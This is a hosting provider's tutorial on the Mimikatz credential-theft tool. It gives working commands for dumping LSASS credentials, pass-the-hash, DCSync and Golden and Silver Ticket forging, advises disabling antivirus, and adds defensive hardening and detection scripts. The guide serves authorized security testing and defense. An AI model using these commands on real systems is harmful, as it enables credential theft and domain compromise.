24.10.2024

How to Install and Use Mimikatz: A Complete Guide for Security Professionals

Mimikatz is one of the most well-known and widely discussed tools in the cybersecurity world. Originally developed as a proof-of-concept to demonstrate vulnerabilities in Windows authentication, it has become an essential instrument in the toolkit of penetration testers, red teamers, and security researchers. This guide provides a thorough walkthrough of what Mimikatz is, who uses it, and how to install and operate it responsibly in a controlled environment.

> Legal Disclaimer: Mimikatz must only be used on systems you own or have explicit written authorization to test. Unauthorized use is illegal and may result in serious criminal penalties. This guide is intended solely for educational purposes and legitimate security testing.

What Is Mimikatz?

Mimikatz is an open-source Windows security tool created by French security researcher Benjamin Delpy. Its primary function is to extract authentication credentials — including plaintext passwords, NTLM password hashes, PIN codes, and Kerberos tickets — directly from a Windows system's memory (specifically from the LSASS process).

Because Windows historically cached credentials in memory to support seamless (single sign-on) authentication across services, Mimikatz was able to expose a fundamental design weakness in how the operating system handled sensitive authentication data. Microsoft has since introduced mitigations such as Credential Guard and the Protected Users security group, but Mimikatz continues to evolve alongside these defenses, making it an invaluable reference tool for understanding the current threat landscape.

Key Capabilities of Mimikatz

  • Plaintext password extraction from Windows memory (LSASS)
  • NTLM hash dumping from the SAM database and Active Directory
  • Kerberos ticket extraction and manipulation (Golden Ticket, Silver Ticket attacks)
  • Pass-the-Hash (PtH) authentication using captured hashes
  • Pass-the-Ticket (PtT) attacks using stolen Kerberos tickets
  • DCSync attacks to replicate domain controller data without direct access

Who Uses Mimikatz and Why?

Legitimate Security Use Cases

Mimikatz is primarily used by information security professionals in the following contexts:

  • Penetration testing — Simulating real-world credential-theft attacks to assess how well an organization's defenses hold up against an adversary who has gained initial access.
  • Red team operations — Emulating advanced persistent threat (APT) techniques to test detection and response capabilities of blue teams and SOC analysts.
  • Security audits — Evaluating whether passwords and Kerberos tickets are stored and protected in accordance with security best practices.
  • Training and awareness — Demonstrating to system administrators and engineers exactly how credential-based attacks work in practice, making abstract threats tangible and actionable.
  • Vulnerability research — Identifying new weaknesses in Windows authentication mechanisms before malicious actors can exploit them.

Malicious Abuse

Unfortunately, Mimikatz is also a favorite tool among threat actors due to its effectiveness. Common malicious use cases include:

  • Pass-the-Hash attacks — Authenticating to systems using captured NTLM hashes without ever knowing the original plaintext password.
  • Pass-the-Ticket attacks — Using stolen Kerberos tickets to impersonate legitimate users across a network.
  • Post-exploitation persistence — Harvesting credentials after an initial breach to move laterally through a network and escalate privileges.
  • Golden Ticket attacks — Forging Kerberos Ticket Granting Tickets (TGTs) to gain persistent, near-unlimited access to domain resources.

Understanding how attackers use Mimikatz is precisely why defenders need to be familiar with it. If you are running a VPS Hosting environment or managing dedicated infrastructure, knowing these attack vectors helps you build more resilient defenses.

Prerequisites

Before proceeding, ensure the following conditions are met in your authorized test environment:

| Requirement | Details |
|---|---|
| Operating System | Windows 7 / Windows 10 / Windows 11 / Windows Server 2008–2022 |
| Privileges | Local Administrator or SYSTEM-level access required for most modules |
| Antivirus Status | Temporarily disabled or configured with an exclusion for the test directory |
| Environment | Isolated lab environment or virtual machine — never on production systems |
| Authorization | Written permission from the system owner is mandatory |

> Best Practice: Always perform Mimikatz testing inside an isolated virtual machine or a dedicated lab server. If you need a secure, isolated environment for penetration testing labs, consider deploying a VPS Hosting instance with a Windows image to keep your tests completely separate from production infrastructure.

Step 1: Download Mimikatz

1.1 Visit the Official GitHub Repository

Mimikatz is maintained as an open-source project. Always download it from the official source to avoid tampered or trojanized versions:

Official Repository: https://github.com/gentilkiwi/mimikatz

1.2 Download the Latest Release

  1. Navigate to the Releases section of the repository (right-hand sidebar or via the /releases URL path).
  2. Locate the most recent stable release.
  3. Download the pre-compiled archive — typically named mimikatz_trunk.zip.

1.3 Extract the Archive

  1. Right-click the downloaded ZIP file.
  2. Select Extract All…
  3. Choose a destination directory, for example: C:\SecurityTools\Mimikatz

After extraction, you will find two subdirectories:

  • x64 — 64-bit binaries (use this on modern systems)
  • Win32 — 32-bit binaries (for legacy systems)

The primary executable you will work with is mimikatz.exe.

Step 2: Run Mimikatz

2.1 Open an Elevated Command Prompt

Mimikatz requires administrative privileges to interact with protected memory regions. To launch an elevated shell:

  1. Press Windows + X
  2. Select Command Prompt (Admin) or Windows PowerShell (Admin)
  3. Click Yes on the UAC prompt

2.2 Navigate to the Mimikatz Directory

cd C:\SecurityTools\Mimikatz\x64

Verify that mimikatz.exe is present in this directory:

dir mimikatz.exe

2.3 Launch Mimikatz

mimikatz.exe

If the tool starts successfully, you will see the Mimikatz banner and the interactive prompt:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

The mimikatz # prompt confirms the tool is running and ready to accept commands.

2.4 Enable Debug Privileges

Before running most credential extraction commands, elevate Mimikatz's own privileges within the session:

mimikatz # privilege::debug

Expected output:

Privilege '20' OK

This enables the SeDebugPrivilege right in the Mimikatz process token (administrators hold the privilege, but it is disabled by default), which is necessary to read the memory of protected processes like LSASS.

Step 3: Core Mimikatz Commands

3.1 Extract Plaintext Passwords from Memory

This is the most well-known Mimikatz capability. It reads the credential material cached by the authentication packages loaded into LSASS (MSV1_0, WDigest, Kerberos, TsPkg and SSP) directly from LSASS memory:

mimikatz # sekurlsa::logonpasswords

What it returns:

  • Logged-on usernames
  • Domain names
  • Plaintext passwords (if WDigest caching is enabled)
  • NTLM hashes
  • SHA1 hashes
  • Kerberos credentials

> Note: On Windows 8.1 and later, Microsoft disabled WDigest plaintext caching by default. However, attackers (and testers) can re-enable it via a registry key, which is why this remains a relevant test case.

3.2 Display Stored Passwords (Alternative Command)

mimikatz # sekurlsa::passwords

This command provides a simplified view of credentials available in system memory.

3.3 Extract Credentials from a Memory Dump File

If you cannot run Mimikatz directly on the target system, you can first capture an LSASS memory dump and analyze it offline:

Create the dump using Task Manager:

  1. Open Task Manager → Details tab
  2. Right-click lsass.exe → Create dump file

Or use ProcDump (from Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analyze the dump with Mimikatz:

mimikatz # sekurlsa::minidump C:\Path\To\lsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 List Kerberos Tickets

To enumerate all Kerberos tickets present in the current logon session:

mimikatz # kerberos::list

To list tickets with full details including session keys:

mimikatz # kerberos::list /export

This exports each ticket as a .kirbi file, which can be used in Pass-the-Ticket attacks.

3.5 Export Credentials to a File

To save the output of a credential dump to a text file for later analysis:

mimikatz # sekurlsa::logonpasswords > C:\SecurityTools\credentials.txt

The output will be written to credentials.txt in the specified path.

Step 4: Advanced Mimikatz Techniques

4.1 Pass-the-Hash (PtH) Attack

Pass-the-Hash allows authentication to a remote system using a captured NTLM hash, without needing the plaintext password:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

This spawns a new cmd.exe process authenticated as the specified user using the hash.

4.2 Golden Ticket Attack

A Golden Ticket is a forged Kerberos TGT signed with the KRBTGT account's password hash, granting the holder near-unlimited access to domain resources. This requires the KRBTGT hash, which can be obtained via DCSync:

Step 1 — DCSync to extract KRBTGT hash:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Step 2 — Create the Golden Ticket:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Step 3 — Inject the ticket:

mimikatz # kerberos::ptt golden.kirbi

4.3 Dump NTLM Hashes from SAM Database

To extract local account hashes from the SAM database (requires SYSTEM privileges):

mimikatz # lsadump::sam

4.4 Dump Secrets from LSA

mimikatz # lsadump::secrets

This retrieves LSA secrets, which may include service account credentials, cached domain credentials, and other sensitive data stored by the Local Security Authority.

4.5 Silver Ticket Attack

A Silver Ticket targets a specific service rather than the entire domain. It requires the NTLM hash of the target service account:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

Step 5: Defensive Countermeasures

Understanding how Mimikatz works is only half the equation. The other half is knowing how to defend against it. If you manage Windows servers — whether on Dedicated Servers or cloud-based infrastructure — the following mitigations are critical:

5.1 Enable Credential Guard

Windows Credential Guard uses virtualization-based security (VBS) to move the secrets that LSASS would otherwise hold into a separate, isolated LSA process (LsaIso.exe) protected by the hypervisor, so Mimikatz cannot read them from LSASS memory.

Enable via Group Policy:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Disable WDigest Authentication

Prevent plaintext password caching by disabling WDigest:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
UseLogonCredential = 0 (REG_DWORD)

5.3 Add Users to the Protected Users Group

Members of the Protected Users security group cannot authenticate using NTLM, DES, or RC4 Kerberos encryption, significantly limiting the effectiveness of credential-theft attacks.

5.4 Implement LSA Protection (RunAsPPL)

Enable Protected Process Light (PPL) for LSASS to prevent unauthorized memory access:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
RunAsPPL = 1 (REG_DWORD)
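To verify the three settings from 5.1, 5.2 and 5.4 on a host, here is an added PowerShell audit script (not part of the original article). It assumes an elevated session, reads Credential Guard status from the Win32_DeviceGuard CIM class, and with -Enforce writes the two registry values shown above; save it as a .ps1 file rather than pasting it interactively.

```powershell
# Added example: audit (and optionally enforce) the LSASS hardening settings
# described in 5.1, 5.2 and 5.4. Run from an elevated PowerShell session.
param([switch]$Enforce)

$checks = @(
    @{ Name = 'WDigest UseLogonCredential'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
       Value = 'UseLogonCredential'; Expected = 0 },
    @{ Name = 'LSA RunAsPPL'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Value = 'RunAsPPL'; Expected = 1 }
)

foreach ($c in $checks) {
    # A missing value comes back as $null. For UseLogonCredential that means the OS
    # default applies (plaintext caching off since Windows 8.1); for RunAsPPL it usually
    # means LSA protection is off (recent Windows 11 builds may enable it without the value).
    $current = (Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
    $ok = ($current -eq $c.Expected)
    $shown = if ($null -eq $current) { '<unset>' } else { $current }
    '{0,-28} current={1,-7} expected={2}  {3}' -f $c.Name, $shown, $c.Expected, $(if ($ok) { 'OK' } else { 'FIX' })

    if (-not $ok -and $Enforce) {
        if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
        Set-ItemProperty -Path $c.Path -Name $c.Value -Value $c.Expected -Type DWord
        "  -> set $($c.Value)=$($c.Expected) (RunAsPPL takes effect after a reboot)"
    }
}

# Credential Guard: SecurityServicesRunning contains 1 while Credential Guard is active.
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
$cgRunning = ($null -ne $dg) -and ($dg.SecurityServicesRunning -contains 1)
'{0,-28} running={1,-7} {2}' -f 'Credential Guard', $cgRunning, $(if ($cgRunning) { 'OK' } else { 'FIX (enable VBS via the Group Policy path in 5.1)' })
```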

5.5 Monitor for Mimikatz Indicators

Configure your SIEM or EDR solution to alert on:

  • Access to lsass.exe memory from unexpected processes
  • SeDebugPrivilege being granted to non-system processes
  • Suspicious sekurlsa, kerberos, or lsadump command patterns in process logs
  • Unusual LSASS dump file creation events (Event ID 4656, 4663)
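As an added example (not from the original article), the following PowerShell function applies the first indicator above to Sysmon Event ID 10 (ProcessAccess) records: it flags processes that open lsass.exe with PROCESS_VM_READ from outside an allow-list or with an unbacked call stack. The allow-list and the two sample records are constructed assumptions for the demo; in production, feed it parsed Get-WinEvent output from the Microsoft-Windows-Sysmon/Operational log.

```powershell
# Added example: detection logic for LSASS memory access, run over Sysmon
# Event ID 10 (ProcessAccess) records. Sample data and allow-list are constructed.

# Processes that legitimately open lsass.exe on a typical host (tune per environment).
$AllowedSources = @(
    'C:\Windows\System32\csrss.exe', 'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\svchost.exe', 'C:\Windows\System32\lsass.exe'
)
$PROCESS_VM_READ = 0x10   # reading credentials out of LSASS requires this access right

function Test-LsassAccess {
    param([Parameter(ValueFromPipeline)] $Record)
    process {
        if ($Record.TargetImage -notlike '*\lsass.exe') { return }
        $access = [int]$Record.GrantedAccess        # Sysmon logs a hex string such as '0x1010'
        $flags = @()
        if ($AllowedSources -notcontains $Record.SourceImage) { $flags += 'source not in allow-list' }
        if ($Record.CallTrace -match 'UNKNOWN')              { $flags += 'unbacked call stack' }
        # Alert only when VM_READ was granted AND another indicator is present; handle-only
        # queries (e.g. 0x1000, PROCESS_QUERY_LIMITED_INFORMATION) are routine and ignored.
        if ((($access -band $PROCESS_VM_READ) -ne 0) -and ($flags.Count -gt 0)) {
            [pscustomobject]@{
                UtcTime = $Record.UtcTime
                Source  = $Record.SourceImage
                Access  = '0x{0:x}' -f $access
                Reason  = $flags -join '; '
            }
        }
    }
}

# Constructed sample: a benign svchost query and a suspicious read from a user-writable path.
$SampleEvents = @(
    [pscustomobject]@{ UtcTime = '2024-10-24 09:01:02'; SourceImage = 'C:\Windows\System32\svchost.exe'
                       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1000'
                       CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+1|C:\Windows\System32\KERNELBASE.dll+2' },
    [pscustomobject]@{ UtcTime = '2024-10-24 09:03:15'; SourceImage = 'C:\Users\Public\tool.exe'
                       TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1010'
                       CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+1|UNKNOWN(00007FF8A1230000)' }
)

# Only the second record is reported (VM_READ from a non-allow-listed image with an unbacked stack).
$SampleEvents | Test-LsassAccess | Format-Table -AutoSize
```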

5.6 Keep Systems Patched

Many Mimikatz techniques exploit known vulnerabilities or legacy behaviors. Keeping Windows and Active Directory fully patched eliminates entire classes of attack vectors.

Mimikatz in the Context of Secure Hosting Infrastructure

For organizations running web applications, APIs, or internal services, the risk of credential theft extends beyond the local workstation. If an attacker gains access to your server environment, tools like Mimikatz can be used to escalate privileges and move laterally.

Choosing a hosting provider that prioritizes security at the infrastructure level is an important layer of defense. Whether you need Shared Web Hosting for smaller projects or Dedicated Servers for enterprise workloads, ensuring your hosting environment includes DDoS protection, network isolation, and regular security updates reduces your overall attack surface.

For teams managing Active Directory environments or Windows-based applications, pairing your infrastructure with properly configured SSL Certificates ensures that credentials transmitted between clients and servers are encrypted in transit — adding another layer of protection against interception.

Summary: Mimikatz Command Reference

| Command | Purpose |
|---|---|
| privilege::debug | Enable SeDebugPrivilege |
| sekurlsa::logonpasswords | Dump all logon credentials from LSASS |
| sekurlsa::passwords | Display cached passwords from memory |
| sekurlsa::minidump <file> | Load and analyze an LSASS dump file |
| kerberos::list | List Kerberos tickets in current session |
| kerberos::list /export | Export Kerberos tickets as .kirbi files |
| kerberos::ptt <ticket> | Inject a Kerberos ticket (Pass-the-Ticket) |
| kerberos::golden | Create a Golden Ticket |
| lsadump::sam | Dump NTLM hashes from SAM database |
| lsadump::secrets | Extract LSA secrets |
| lsadump::dcsync | Replicate domain credentials via DCSync |
| sekurlsa::pth | Perform Pass-the-Hash attack |

Conclusion

Mimikatz remains one of the most powerful and instructive tools available to cybersecurity professionals. Its ability to expose fundamental weaknesses in Windows authentication mechanisms has driven significant improvements in how Microsoft designs credential protection — from Credential Guard to Protected Users to LSA PPL. For penetration testers, red teamers, and security researchers, a thorough understanding of Mimikatz is not optional; it is essential.

The key principles to always keep in mind:

  • Always obtain explicit written authorization before using Mimikatz on any system.
  • Use isolated environments — virtual machines or dedicated lab servers — to avoid accidental exposure.
  • Understand the defenses as deeply as you understand the attacks.
  • Stay current — both Mimikatz and Windows defenses evolve continuously.

By combining hands-on knowledge of tools like Mimikatz with a secure, well-configured hosting infrastructure, security teams can build defenses that are genuinely tested against real-world attack techniques rather than theoretical assumptions.

*AlexHost provides secure, high-performance hosting solutions designed with security-conscious professionals in mind. Explore our VPS Hosting plans and Dedicated Servers to build your next secure lab or production environment.*
